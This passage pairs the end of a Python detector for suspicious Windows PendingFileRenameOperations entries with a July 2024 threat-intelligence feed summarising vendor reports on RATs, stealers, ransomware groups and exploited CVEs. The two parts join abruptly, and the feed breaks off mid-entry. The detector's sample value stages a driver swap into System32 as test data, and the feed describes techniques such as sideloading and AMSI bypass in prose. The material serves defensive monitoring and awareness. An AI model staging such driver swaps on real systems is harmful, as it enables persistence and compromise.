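# a benign temp-file cleanup followed by a staged driver swapped into System32.
SAMPLE_VALUE = [
    "\\??\\C:\\Windows\\Temp\\ABC123.tmp", "",
    "\\??\\C:\\Users\\Public\\Libraries\\drv.dat", "!\\??\\C:\\Windows\\System32\\drivers\\example.sys",
]

if __name__ == "__main__":
    for op in suspicious_ops(parse_pending_renames(SAMPLE_VALUE)):
        print(op)
```

On a live host, read the value with `Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager' -Name PendingFileRenameOperations` and pass the resulting string array in; Windows Update and installers legitimately populate it, so the signal is in where the sources come from, not in the value existing at all.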
2024-07-12
ValleyRAT_Latest_Variant
MEDIUM
+
Intel Source:
ZScaler
Intel Name:
ValleyRAT_Latest_Variant
Date of Scan:
2024-07-12
Impact:
MEDIUM
Summary:
Zscaler's ThreatLabz has conducted an in-depth analysis of the latest ValleyRAT variant. The malware uses a multi-stage attack chain that begins with a downloader retrieving files from an HFS server and decrypting them to unpack further stages. It checks for antivirus products and terminates specific security processes. In the second stage, it uses a legitimate Microsoft Word executable to sideload a malicious DLL, which injects shellcode into svchost.exe for further payload delivery. ValleyRAT establishes persistence by modifying autorun keys and sets its files' attributes to hidden and system. The final payload has expanded capabilities, including enhanced device fingerprinting, dynamic API resolving, and new commands for remote operations such as screenshot capture and forced system actions.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-latest-variant-valleyrat
2024-07-12
Unmasking_FIN7_Campaigns
LOW
+
Intel Source:
Silent Push
Intel Name:
Unmasking_FIN7_Campaigns
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Researchers from Silent Push have identified the largest collection of FIN7 infrastructure to date, including over 4,000 IOFA (Indicators of Future Attack) domains and IP addresses. The infrastructure impersonates prominent global brands such as the Louvre, Meta, Reuters, and Microsoft in large-scale phishing and malware attacks. FIN7 mainly targets U.S. industries such as retail, hospitality, tech, consulting, and financial services. The research indicates either a resurgence of FIN7 or the repurposing of its tactics for new campaigns.
Source: https://www.silentpush.com/blog/fin7/#h-iofas
2024-07-12
PDF_files_embedded_with_QRcodes
LOW
+
Intel Source:
SonicWall
Intel Name:
PDF_files_embedded_with_QRcodes
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
SonicWall researchers have observed malware authors using PDF files containing QR codes as lures, because QR codes are popular and used in every sector. The PDFs arrive by email and ask users to scan the code for security updates or document signing. Scanning the QR code redirects to a phishing page that mimics the official Microsoft login page; once users enter their Microsoft username and password, the attackers use the credentials to access their email, personal information, and sensitive company data.
Source: https://blog.sonicwall.com/en-us/2024/07/the-hidden-danger-of-pdf-files-with-embedded-qr-codes/
2024-07-12
Data_Breaches_Exploited_in_Cryptocurrency_Scams
LOW
+
Intel Source:
Cisco Talos
Intel Name:
Data_Breaches_Exploited_in_Cryptocurrency_Scams
Date of Scan:
2024-07-12
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered a new cryptocurrency scam that exploits data breaches. Attackers are leveraging stolen information to conduct more advanced and damaging attacks, capitalizing on victims' concerns about their compromised data. The impact of these data breaches extends beyond the immediate loss of information, affecting the security, reputation, and financial stability of both individuals and organizations.
Source: https://blog.talosintelligence.com/data-breaches-fueling-scam-campaigns/
2024-07-11
Akira_Ransomware_Targets_LATAM_Airlines_industry
MEDIUM
Intel Source:
Blackberry
Intel Name:
Akira_Ransomware_Targets_LATAM_Airlines_industry
Date of Scan:
2024-07-11
Impact:
MEDIUM
Summary:
Researchers at BlackBerry have identified a threat actor leveraging Akira ransomware to target a Latin American airline by exploiting a vulnerability in the Veeam Backup & Replication component (CVE-2023-27532). The threat actor also abused several legitimate tools to achieve the goal of exfiltrating data. Akira ransomware first emerged in March 2023 and is associated with the RaaS group known as Storm-1567 (aka Punk Spider and GOLD SAHARA). The group employs a double-extortion tactic and encrypts data in Windows, Linux, and VMware environments. The group has targeted 250 organisations across the globe.
Source: https://blogs.blackberry.com/en/2024/07/akira-ransomware-targets-the-latam-airline-industry
2024-07-11
DodgeBox_an_Exploring_APT41_Updated_Arsenal
LOW
Intel Source:
Zscaler
Intel Name:
DodgeBox_an_Exploring_APT41_Updated_Arsenal
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Zscaler researchers have discovered a new malware loader called DodgeBox. It closely resembles StealthVector, a tool associated with the Chinese APT group APT41, also known as Earth Baku. DodgeBox loads a new backdoor named MoonWalk, which uses Google Drive for command-and-control. APT41 has upgraded StealthVector to DodgeBox, employing advanced evasion tactics such as DLL sideloading and call stack spoofing to evade detection.
Source: https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1
2024-07-11
Ransomware_Targeting_Veeam_Backup_Vulnerability
LOW
Intel Source:
GROUP-IB
Intel Name:
Ransomware_Targeting_Veeam_Backup_Vulnerability
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Researchers from GROUP-IB have observed exploitation of CVE-2023-27532, a vulnerability in Veeam Backup & Replication software that was disclosed in March 2023. Veeam has since fixed this issue in versions 12/11a and later. Following the exploitation attempts of CVE-2023-27532, threat actors activated xp_cmdshell and created rogue user accounts. They are using tools such as NetScan, AdFind, and various utilities from NirSoft to perform network discovery, enumeration, and credential harvesting.
Source: https://www.group-ib.com/blog/estate-ransomware/
2024-07-11
New_Poco_RAT_Malware
LOW
Intel Source:
Cofense
Intel Name:
New_Poco_RAT_Malware
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Cofense researchers have identified a new malware named Poco RAT, a basic Remote Access Trojan targeting Spanish-language victims. It first appeared in early 2024, focusing mostly on mining-related businesses, and was initially distributed via embedded links to Google Drive-hosted 7zip archives containing executable files. The campaigns are still active and exhibit the same TTPs. The majority of the malware's specialized code appears to be focused on anti-analysis, communication with its command and control (C2) server, and downloading or running files, with very little devoted to monitoring or collecting credentials.
Source: https://cofense.com/blog/new-malware-campaign-targeting-spanish-language-victims/
2024-07-11
CRYSTALRAY_Threat_Actor
MEDIUM
Intel Source:
Sysdig
Intel Name:
CRYSTALRAY_Threat_Actor
Date of Scan:
2024-07-11
Impact:
MEDIUM
Summary:
Sysdig threat researchers have identified a new threat actor called CRYSTALRAY, which first emerged in early 2024. Initially, this threat actor was known for exploiting Confluence vulnerabilities. However, CRYSTALRAY is now expanding its operations and has affected 1,500 victims. The attacker gains access to its targets by modifying existing vulnerability proofs of concept to carry its payload, and installs backdoors using multiple open-source security tools. Its goals are to gather and sell credentials, deploy cryptominers, and maintain persistence in victims' environments. It uses tools like zmap, asn, httpx, nuclei, platypus, and SSH-Snake to carry out its attacks.
Source: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/
2024-07-11
Darkgate_Malware_Campaign
MEDIUM
Intel Source:
PaloAlto
Intel Name:
Darkgate_Malware_Campaign
Date of Scan:
2024-07-11
Impact:
MEDIUM
Summary:
Researchers from Palo Alto Networks have uncovered a new malware campaign distributing DarkGate, active from March to April 2024, which uses Microsoft Excel files to download malicious software from publicly accessible SMB file shares. DarkGate initially emerged in 2018 and has evolved into a malware-as-a-service (MaaS) offering. Researchers also observed multiple distribution methods, such as Teams chat, PDF files, ZIP archives and HTML files, that use AutoIt to infect victims with DarkGate malware. The primary victims of this campaign are in North America, Europe and some parts of Asia.
Source: https://unit42.paloaltonetworks.com/darkgate-malware-uses-excel-files/
2024-07-11
A_Strong_Foothold_For_Medusa_Ransomware
LOW
Intel Source:
Coinmonks
Intel Name:
A_Strong_Foothold_For_Medusa_Ransomware
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
According to Coinmonks researchers, Medusa Ransomware came to prominence in June 2023 when a high level of activity was detected, although the group was formed in 2021. The ransom note is titled !!!READ_ME_MEDUSA!!!.txt, and it appends the .MEDUSA extension to the names of encrypted files. At the time of writing (ATTOW), Medusa's dark web leak site lists about 255 victims, of which 138 are in the United States (US), 22 in Canada and 21 in the UK. The main target sectors for this group include Manufacturing, Services, Education, Finance and Healthcare.
Source: https://medium.com/coinmonks/medusa-ransomware-setting-strong-foothold-b8729844df5b
2024-07-11
Exploitation_of_PHP_Vulnerability_CVE_2024_4577
LOW
Intel Source:
Akamai
Intel Name:
Exploitation_of_PHP_Vulnerability_CVE_2024_4577
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Researchers from Akamai have observed exploitation activity targeting CVE-2024-4577, a PHP vulnerability. This vulnerability affects Windows installations using Chinese and Japanese locales, but it might impact other installations as well. The exploitation attempts involve command injection and malware campaigns delivering Gh0st RAT, RedTail cryptominers, and XMRig. Akamai's App & API Protector has been automatically blocking these exploits for their customers.
Source: https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure#com
2024-07-11
An_Overview_of_BianLian_Ransomware_Group
MEDIUM
Intel Source:
Juniper Networks
Intel Name:
An_Overview_of_BianLian_Ransomware_Group
Date of Scan:
2024-07-11
Impact:
MEDIUM
Summary:
Juniper researchers have observed the activities of the BianLian ransomware group, which emerged in 2022. It is now one of the top three active ransomware groups, after Lockbit and AlphV. BianLian threat actors gain initial access by leveraging compromised Remote Desktop Protocol (RDP) credentials, often gained via phishing. They deploy custom malware written in the Go programming language to evade detection. BianLian's operations focus on a double-extortion approach of encrypting and stealing data. This group mainly targets the legal and healthcare sectors due to their sensitive and critical data. However, BianLian also attacks other industries such as Finance, Accounting, Transportation, Manufacturing, and smaller sectors.
Source: https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis
2024-07-11
Malicious_NuGet_campaign
LOW
Intel Source:
Reversinglabs
Intel Name:
Malicious_NuGet_campaign
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Researchers at ReversingLabs have uncovered a malicious campaign targeting the NuGet package manager that has been active since August 2023. Initially, attackers were using PowerShell scripts but switched their tactics to exploit NuGet's MSBuild integrations. They also made an effort to make their malicious packages appear legitimate by mimicking trusted packages, creating deceptive typosquatting names, and inflating download counts. The attackers use a technique called IL weaving to modify code and release it under homoglyph names like Gսոa.UI3.Wіnfօrms. This campaign also shows how attackers keep changing their tactics to lure developers and security teams into downloading and using malicious packages from open-source platforms like NuGet.
Source: https://www.reversinglabs.com/blog/malicious-nuget-campaign-uses-homoglyphs-and-il-weaving-to-fool-devs
2024-07-11
Ransomware_Activity_Trends
LOW
Intel Source:
Symantec
Intel Name:
Ransomware_Activity_Trends
Date of Scan:
2024-07-11
Impact:
LOW
Summary:
Symantec researchers have analyzed ransomware activity and observed that in the first quarter of 2024 there was a slight decline as major groups such as Noberus and LockBit were disrupted. However, the trend remains generally upward compared to the same period in 2023. According to data from ransomware leak sites, there were 962 reported attacks in Q1 2024; this was a reduction compared to Q4 2023 but an increase over Q1 2023. It is worth mentioning that law enforcement involvement led to the closure of Noberus by March of this year.
Source: https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomware-q2-2024
2024-07-10
ZeroDay_Exploitation_of_CVE_2024_38112
LOW
Intel Source:
CheckPoint
Intel Name:
ZeroDay_Exploitation_of_CVE_2024_38112
Date of Scan:
2024-07-10
Impact:
LOW
Summary:
Researchers at Check Point have discovered that threat actors are using a zero-day vulnerability (CVE-2024-38112) leveraging internet shortcut files (.url extension) to achieve remote code execution on Windows systems. By making use of these files, the attackers are able to launch Internet Explorer, which has long been retired and is less secure than modern browsers like Chrome and Edge, in order to mask a malicious .hta file and compromise machines running Windows 10/11.
Source: https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
2024-07-10
Ticket_Heist_Campaign
MEDIUM
Intel Source:
QuoIntelligence
Intel Name:
Ticket_Heist_Campaign
Date of Scan:
2024-07-10
Impact:
MEDIUM
Summary:
Researchers at QuoIntelligence have identified a fraudulent campaign linked to the Paris Olympics called Ticket Heist. This campaign primarily targets Russian- and English-speaking individuals worldwide and in Eastern European countries. The fraudsters lure victims into buying tickets for the Paris 2024 Olympic Games and UEFA EURO 2024 events from untrusted and unofficial platforms. This fraudulent activity extends beyond sporting events to include events such as music festivals featuring famous musicians. The impact of such campaigns includes financial losses, reputational damage, and loss of trust for both individuals and event organizers.
Source: https://quointelligence.eu/2024/07/ticket-heist-olympic-games-and-sporting-events-at-risk/
2024-07-10
Russian_State_Sponsored_Media_Used_Meliorator_Tool
MEDIUM
Intel Source:
IC3 GOV
Intel Name:
Russian_State_Sponsored_Media_Used_Meliorator_Tool
Date of Scan:
2024-07-10
Impact:
MEDIUM
Summary:
An advisory has been released by the U.S. Federal Bureau of Investigation (FBI) and Cyber National Mission Force (CNMF), in collaboration with the Netherlands General Intelligence and Security Service (AIVD), Netherlands Military Intelligence and Security Service (MIVD), the Netherlands Police (DNP), and the Canadian Centre for Cyber Security (CCCS), collectively known as the authoring organizations, to alert social media companies to the use of covert Meliorator software by Russian state-sponsored actors for foreign malign influence activity that benefits the Russian government.
Source: https://www.ic3.gov/Media/News/2024/240709.pdf
2024-07-10
Evasion_Tactics_in_HTML_Smuggling
LOW
Intel Source:
Cisco Talos
Intel Name:
Evasion_Tactics_in_HTML_Smuggling
Date of Scan:
2024-07-10
Impact:
LOW
Summary:
Researchers from Cisco Talos have discovered numerous malicious email campaigns using a technique called HTML Smuggling where JavaScript code is hidden in HTML email attachments. This technique is commonly used in spear phishing attacks, often targeting human resources, insurance, and healthcare sectors, while e-commerce and legal sectors are less affected. Attackers use various evasion techniques to bypass email gateways and advanced detection methods. These tricks include different encoding techniques, encryption and obfuscation.
Source: https://blog.talosintelligence.com/hidden-between-the-tags-insights-into-evasion-techniques-in-html-smuggling/
2024-07-10
ViperSoftX_Malware_Using_Torrented_eBooks
LOW
Intel Source:
Trellix
Intel Name:
ViperSoftX_Malware_Using_Torrented_eBooks
Date of Scan:
2024-07-10
Impact:
LOW
Summary:
Researchers at Trellix have observed that ViperSoftX has evolved into a new type of malware proficient at penetrating systems and extracting sensitive information. It initially spread through cracked software, tricking users into downloading pirated apps that secretly installed the malware. While it was mainly spread through torrent sites, researchers have now noticed that it is being specifically distributed as eBooks over torrents.
Source: https://www.trellix.com/blogs/research/the-mechanics-of-vipersofts-exploiting-autoit-and-clr-for-stealthy-powershell-execution/
2024-07-10
Coyote_Banking_Trojan_Targeting_LATAM
MEDIUM
Intel Source:
Blackberry
Intel Name:
Coyote_Banking_Trojan_Targeting_LATAM
Date of Scan:
2024-07-10
Impact:
MEDIUM
Summary:
Researchers at BlackBerry have identified Coyote as a .NET banking Trojan targeting Brazilian financial institutions such as banks. It is distinct from other banking Trojans because of its unconventional execution chain. Researchers first found it in February 2024, and it was named Coyote because of its use of Squirrel, a legitimate tool used to install and/or update Windows applications.
Source: https://blogs.blackberry.com/en/2024/07/coyote-banking-trojan-targets-latam-with-a-focus-on-brazilian-financial-institutions
2024-07-09
Warning_of_China_Linked_APT40_Group
MEDIUM
Intel Source:
CISA
Intel Name:
Warning_of_China_Linked_APT40_Group
Date of Scan:
2024-07-09
Impact:
MEDIUM
Summary:
A joint advisory about a China-linked cyber espionage group called APT40 has been released by cybersecurity agencies ASD's ACSC, CISA, NSA, FBI, NCSC-UK, CCCS, NCSC-NZ, BND and BfV, NIIS, NIS, NISC, and NPA. The advisory warns about APT40's ability to co-opt exploits for recently disclosed security flaws within hours or days of public release. APT40 has previously targeted organizations in many countries, including Australia and the United States. Most notably, APT40 can quickly modify and adapt vulnerability proofs-of-concept (PoCs) for use in targeting, reconnaissance, and exploitation operations.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-190a
2024-07-09
Exploitation_of_V8_JavaScript_Malware
LOW
Intel Source:
Check Point
Intel Name:
Exploitation_of_V8_JavaScript_Malware
Date of Scan:
2024-07-09
Impact:
LOW
Summary:
Researchers at Check Point have explored how malware developers use compiled V8 JavaScript. Compiled V8 JavaScript is a less well-known feature of V8, Google's JavaScript engine, that allows JavaScript to be compiled into low-level bytecode. This method makes the code very hard to analyze statically, helping attackers avoid static detections and conceal their original source code.
Source: https://research.checkpoint.com/2024/exploring-compiled-v8-javascript-usage-in-malware/
2024-07-09
NPM_Campaign_Ships_Trojanized_jQuery
LOW
Intel Source:
Phylum
Intel Name:
NPM_Campaign_Ships_Trojanized_jQuery
Date of Scan:
2024-07-09
Impact:
LOW
Summary:
Researchers from Phylum have monitored a persistent supply chain attacker using a trojanized version of jQuery. The compromised version was first found by them on npm, where they observed it being published in numerous packages over a month. Upon further investigation, they discovered that the trojanized version of jQuery was present on numerous websites, including GitHub, and even on jsDelivr as a CDN-hosted resource.
Source: https://blog.phylum.io/persistent-npm-campaign-shipping-trojanized-jquery/
2024-07-09
New_Version_of_XFiles_Stealer
LOW
Intel Source:
ThreatMon
Intel Name:
New_Version_of_XFiles_Stealer
Date of Scan:
2024-07-09
Impact:
LOW
Summary:
Researchers from ThreatMon have noticed that the C-written XFiles Stealer has been updated and announced on a dark web forum. XFiles runs on Windows 7 to Windows 11 systems. It gathers browser usage information, cookies, credit card information, passwords, and autofill data, and supports more than 80 browser-based cryptocurrency wallets. A plethora of messenger targets, a file encryption system, training guides tailored to XFiles, and much more are included in the stealer.
Source: https://x.com/monthreat/status/1810610913520599462?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-09
Cryptocurrency_drainer_phishing_scams
LOW
Intel Source:
Cisco Talos
Intel Name:
Cryptocurrency_drainer_phishing_scams
Date of Scan:
2024-07-09
Impact:
LOW
Summary:
Researchers at Cisco Talos have uncovered a phishing campaign linked to cryptocurrency scams. These scams are becoming a major threat to the cryptocurrency world. In this campaign, scammers target cryptocurrency holders and use social engineering tactics to entice people to reveal their login credentials. These scams attract investors with the promise of high returns on investment and exciting new technology. However, instead of fulfilling their promises, the scammers abscond with the investors' funds.
Source: https://blog.talosintelligence.com/how-do-cryptocurrency-drainer-phishing-scams-work/
2024-07-08
An_Examination_of_Kematian_Stealer
LOW
Intel Source:
Cyfirma
Intel Name:
An_Examination_of_Kematian_Stealer
Date of Scan:
2024-07-08
Impact:
LOW
Summary:
Researchers at CYFIRMA have uncovered Kematian-Stealer, a sophisticated info stealer targeting Windows systems, hosted on GitHub. This open-source malware is designed to stealthily extract data from a wide range of sources including browsers, cryptocurrency wallets, messaging apps, gaming platforms, VPNs, and email clients. It employs advanced techniques such as covert data extraction, persistence mechanisms, detection evasion, in-memory execution, and data exfiltration via Discord webhooks. It can also download and execute additional scripts and payloads directly into memory.
Source: https://www.cyfirma.com/research/kematian-stealer-a-deep-dive-into-a-new-information-stealer/
2024-07-08
DoNex_Ransomware
MEDIUM
Intel Source:
Avast
Intel Name:
DoNex_Ransomware
Date of Scan:
2024-07-08
Impact:
MEDIUM
Summary:
Researchers from Avast have analyzed the activity of the DoNex ransomware and its predecessors. In cooperation with law enforcement organizations, Avast has been silently providing a decryptor to DoNex ransomware victims since March 2024. The DoNex ransomware has been rebranded several times. The first brand, called Muse, appeared in April 2022. It then rebranded as a fake LockBit 3.0; the next rebrand was to DarkRace in May 2023, and another to DoNex in March 2024.
Source: https://decoded.avast.io/threatresearch/decrypted-donex-ransomware-and-its-predecessors/
2024-07-08
Linux_hosts_activity
LOW
Intel Source:
ISC.SANS
Intel Name:
Linux_hosts_activity
Date of Scan:
2024-07-08
Impact:
LOW
Summary:
Recently, ISC.SANS researcher Xavier Mertens attended a conference focusing on open-source software and cybersecurity. He was introduced to the tool Kunai. This tool, developed by Quentin Jérôme from the Luxembourg CERT, aims to replace SysmonForLinux. Its purpose is to record and log system activity, but in a more Linux-oriented flavor. Kunai is developed in Rust and uses eBPF to interact with the kernel (compatible with all Linux LTS kernels from 5.4 to 6.6).
Source: https://isc.sans.edu/diary/rss/31054
2024-07-08
Cloud_Snooper_Attack
MEDIUM
Intel Source:
Linkedin
Intel Name:
Cloud_Snooper_Attack
Date of Scan:
2024-07-08
Impact:
MEDIUM
Summary:
A unique combination of techniques is used in the Cloud Snooper composite attack to allow malware on compromised hosts to interact easily with command and control servers. In order to send commands to and receive data from the backdoor, the adversary uses a rootkit that monitors network traffic in conjunction with the backdoor.
Source: https://www.linkedin.com/posts/hackforlab_threathunting-threatintelligence-cybersecurity-activity-7215365934096470016-rdCK?utm_source=share&utm_medium=member_ios
2024-07-08
CloudSorcerer_Targeting_Russian_Entities
LOW
Intel Source:
Securelist
Intel Name:
CloudSorcerer_Targeting_Russian_Entities
Date of Scan:
2024-07-08
Impact:
LOW
Summary:
Researchers from Securelist have discovered a new APT called CloudSorcerer, which targets Russian government entities. This advanced tool is used for covert monitoring, data collection, and data theft through Microsoft Graph, Yandex Cloud, and Dropbox. It uses these cloud services as its C2 servers, accessing them with authentication tokens. CloudSorcerer also uses GitHub as its initial C2 server.
Source: https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/
2024-07-05
New_Indicators_of_AsyncRAT
LOW
Intel Source:
X (Twitter)
Intel Name:
New_Indicators_of_AsyncRAT
Date of Scan:
2024-07-05
Impact:
LOW
Summary:
The Fox_threatintel researchers have shared new indicators of compromise for AsyncRAT on X (Twitter). AsyncRAT is a remote access trojan (RAT) released in 2019, used primarily as a credential stealer and loader for other malware, including ransomware. It also has botnet capabilities and a command and control (C2) interface allowing operators to control infected hosts remotely.
Source: https://x.com/banthisguy9349/status/1808888209306251349?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-05
Neptune_Stealer
LOW
Intel Source:
ThreatMon
Intel Name:
Neptune_Stealer
Date of Scan:
2024-07-05
Impact:
LOW
Summary:
The ThreatMon researchers have detected an open-source stealer tool named Neptune Stealer, developed in Python, which has been shared on GitHub. It is claimed to have many features, such as the ability to steal cookie information from websites, system information, browser history, webcam screenshots, Wi-Fi passwords and autofill information, as well as a keylogger and a crypto wallet stealer. It starts every time the target's machine boots.
Source: https://x.com/monthreat/status/1808839272142668037?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-05
FedEx_Themed_Phishing_Attacks_Hit_Italy
LOW
Intel Source:
CERT-AGID
Intel Name:
FedEx_Themed_Phishing_Attacks_Hit_Italy
Date of Scan:
2024-07-05
Impact:
LOW
Summary:
Researchers from CERT-AgID have observed new phishing campaigns targeting FedEx users in Italy. These scams use fake shipping communications to deceive recipients and steal their personal and financial data. Users are advised to be cautious and verify the authenticity of any emails claiming to be from FedEx.
Source: https://cert-agid.gov.it/news/in-corso-campagne-di-phishing-italiane-a-tema-fedex/
2024-07-05
Eldorado_Ransomware
MEDIUM
Intel Source:
Group-IB
Intel Name:
Eldorado_Ransomware
Date of Scan:
2024-07-05
Impact:
MEDIUM
Summary:
Researchers at Group-IB have observed the activity of a new RaaS group called Eldorado, which appeared in March 2024 and offers locker and loader variants for Linux and Windows. The operators of this group are promoting their malicious service on the RAMP forum and are seeking skilled affiliates to join their program. This group has attacked 16 companies globally, most of them in the US. The industries most targeted by this group are real estate, healthcare, manufacturing, and government. Eldorado uses Golang ransomware that can encrypt both Windows and Linux systems with two similar variants of the malware.
Source: https://www.group-ib.com/blog/eldorado-ransomware/
2024-07-05
ScreenConnect_Link_to_AsyncRAT_Deployment
LOW
Intel Source:
Esentire
Intel Name:
ScreenConnect_Link_to_AsyncRAT_Deployment
Date of Scan:
2024-07-05
Impact:
LOW
Summary:
eSentire researchers have uncovered a sophisticated campaign in which threat actors abuse the ScreenConnect remote access client to deliver the AsyncRAT trojan from fraudulent websites. The attack occurs when a user visits a compromised website and is automatically redirected to download the ScreenConnect application. Once ScreenConnect is downloaded, it connects to the threat actor's instances. This establishes a remote session that allows the attacker to drop an executable file that leads to AsyncRAT. AsyncRAT gives the attackers extensive control over the compromised systems, enabling data theft, system manipulation, and further malware deployment.
Source: https://www.esentire.com/blog/exploring-the-infection-chain-screenconnects-link-to-asyncrat-deployment
2024-07-05
Exploiting_Jenkins_for_Cryptomining
LOW
Intel Source:
Trend Micro
Intel Name:
Exploiting_Jenkins_for_Cryptomining
Date of Scan:
2024-07-05
Impact:
LOW
Summary:
Researchers from Trend Micro observed that attackers can misuse the Jenkins Script Console to run harmful scripts for purposes such as cryptocurrency mining. To protect against this, organizations should ensure proper configuration, strong authentication and authorization, regular audits, and limited internet exposure of Jenkins servers. These steps can help prevent Jenkins from being used as an attack point and protect development environments from exploitation.
Source: https://www.trendmicro.com/en_us/research/24/g/turning-jenkins-into-a-cryptomining-machine-from-an-attackers-pe.html
2024-07-05
Exploitating_Microsoft_SmartScreen_vulnerability
MEDIUM
Intel Source:
Cyble
Intel Name:
Exploitating_Microsoft_SmartScreen_vulnerability
Date of Scan:
2024-07-05
Impact:
MEDIUM
Summary:
CRIL researchers have uncovered an active campaign exploiting a Microsoft SmartScreen vulnerability to deploy malware such as Lumma and Meduza Stealer, which steal sensitive information. This campaign targets regions such as Spain, the US, and Australia. The attack begins with a spam email that looks like it comes from a legitimate source. The email entices the user into clicking a link to view an internet shortcut file on a remote WebDAV share; when the user clicks this file, it exploits the vulnerability and runs another LNK file from the same WebDAV share. The attack uses different script types, such as PowerShell and JavaScript, to deliver the final payload.
Source: https://cyble.com/blog/increase-in-the-exploitation-of-microsoft-smartscreen-vulnerability-cve-2024-21412/
2024-07-05
Turla_Exploits_Shortcut_File_and_Fileless_Backdoor
MEDIUM
Intel Source:
GDATA
Intel Name:
Turla_Exploits_Shortcut_File_and_Fileless_Backdoor
Date of Scan:
2024-07-05
Impact:
MEDIUM
Summary:
Researchers at GDATA have discovered a well-planned cyber attack campaign that made use of malicious shortcut files for the deployment of a fileless backdoor to systems. Attackers employed advanced tactics such as memory patching, AMSI bypass, and event logging disablement to evade detection and improve their capabilities. Among those behind these new attacks is the well-known Turla (Uroburos) group.
Source: https://www.gdatasoftware.com/blog/2024/07/37977-turla-evasion-lnk-files
2024-07-04
Mekotio_Banking_Trojan_Targeting_Financial_Systems
LOW
Intel Source:
TrendMicro
Intel Name:
Mekotio_Banking_Trojan_Targeting_Financial_Systems
Date of Scan:
2024-07-04
Impact:
LOW
Summary:
Researchers at Trend Micro have investigated the Mekotio banking trojan, a sophisticated malware targeting Latin American countries since 2015 with the goal of stealing sensitive information, particularly banking credentials, from its targets. Its methods involve phishing emails employing social engineering to trick users into clicking malicious links or attachments. Furthermore, researchers have recently seen a surge in attacks involving Mekotio globally.
Source: https://www.trendmicro.com/en_us/research/24/g/mekotio-banking-trojan.html
2024-07-04
Brain_Cipher_Targeting_Indonesian_Data_Center
MEDIUM
Intel Source:
SOC Radar
Intel Name:
Brain_Cipher_Targeting_Indonesian_Data_Center
Date of Scan:
2024-07-04
Impact:
MEDIUM
Summary:
SOC Radar researchers have identified the Brain Cipher ransomware group, which attracted global notice following a high-profile attack on Indonesia's National Data Center (Pusat Data Nasional - PDN), which affected critical public functions such as immigration. On June 20, a cyberattack targeted one of Indonesia's national data centers. The attack compromised government servers, causing disruptions in immigration, passport control, event permit issuance, and other internet services.
Source: https://socradar.io/dark-web-profile-brain-cipher/
2024-07-04
Analyzing_GootLoader_Using_Node_js
LOW
Intel Source:
PaloAlto
Intel Name:
Analyzing_GootLoader_Using_Node_js
Date of Scan:
2024-07-04
Impact:
LOW
Summary:
PaloAlto researchers have demonstrated how to use Visual Studio Code's Node.js debugging to get around GootLoader malware's anti-analysis tactics. This evasion strategy utilized by GootLoader JavaScript files can pose a significant problem to sandboxes attempting to evaluate the malware.
Source: https://unit42.paloaltonetworks.com/javascript-malware-gootloader/
2024-07-04
Attacks_on_HTTP_File_Servers_CVE_2024_23692
MEDIUM
Intel Source:
ASEC
Intel Name:
Attacks_on_HTTP_File_Servers_CVE_2024_23692
Date of Scan:
2024-07-04
Impact:
MEDIUM
Summary:
ASEC researchers have examined how the CVE-2024-23692 vulnerability in HTTP File Server (HFS) is being exploited, revealing how attackers use it to run harmful commands remotely. The research also highlights the deployment of CoinMiners and backdoors like PlugX and GoThief, and includes countermeasures for at-risk systems.
Source: https://asec.ahnlab.com/en/67650/
2024-07-04
LockBit_Black_Decryptor
HIGH
Intel Source:
Malware Hunter
Intel Name:
LockBit_Black_Decryptor
Date of Scan:
2024-07-04
Impact:
HIGH
Summary:
The MalwareHunterTeam has shared on X (Twitter) a LockBit Black decryptor file that was possibly provided by the Brain Cipher ransomware group to one of its victims.
Source: https://x.com/malwrhunterteam/status/1808814100731826673?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-04
Mirai_Botnet
LOW
Intel Source:
X (Twitter)
Intel Name:
Mirai_Botnet
Date of Scan:
2024-07-04
Impact:
LOW
Summary:
The new URLs reported by Abuse.CH are associated with the Mirai Botnet and have been observed by security researcher WatchingRac on X (Twitter). Mirai Botnet infects smart devices that run on ARC processors, turning them into a network of remotely controlled bots or zombies. This network of bots, called a botnet, is often used to launch DDoS attacks.
Source: https://x.com/racwatchin8872/status/1808797006153822577?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-04
Mallox_Ransomware_Targeting_Linux
LOW
Intel Source:
Uptycs
Intel Name:
Mallox_Ransomware_Targeting_Linux
Date of Scan:
2024-07-04
Impact:
LOW
Summary:
Researchers from Uptycs have discovered a new variant of the Mallox ransomware, also known as Fargo, that targets Linux systems. The Mallox group is known for multi-extortion tactics, encrypting victims' data and threatening to release it on their TOR-based sites. Initially, Mallox payloads were .NET-based, .EXE, or .DLL files, spreading through exposed MS-SQL servers and phishing emails to target Windows systems.
Source: https://www.uptycs.com/blog/mallox-ransomware-linux-variant-decryptor-discovered
2024-07-03
CyberVolk_Ransomware
LOW
+
Intel Source:
X (Twitter)
Intel Name:
CyberVolk_Ransomware
Date of Scan:
2024-07-03
Impact:
LOW
Summary:
Security researcher Siri_urz identified the CyberVolk group unveiling new ransomware dubbed CyberVolk Ransomware with a unique encryption algorithm.
Source: https://x.com/siri_urz/status/1808126707951346116?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-03
AsyncRAT_Disguised_as_an_E_Book
LOW
+
Intel Source:
ASEC
